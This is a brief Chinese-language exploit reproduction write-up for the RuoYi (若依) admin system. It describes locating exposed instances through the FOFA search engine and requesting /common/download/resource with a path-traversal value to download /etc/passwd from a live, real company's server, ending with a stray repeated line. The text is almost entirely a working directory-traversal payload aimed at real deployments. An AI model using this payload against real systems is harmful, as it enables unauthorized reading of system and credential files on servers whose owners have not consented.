在fofa上寻找若依管理系统
因为暴露某公司信息 不便展示
访问如下抓包路径:
/common/download/resource?resource=/profile/../../../../etc/passwd
实际上已经下载保存一个隐私文件passwd
复现完毕。
访问如下抓包路径:
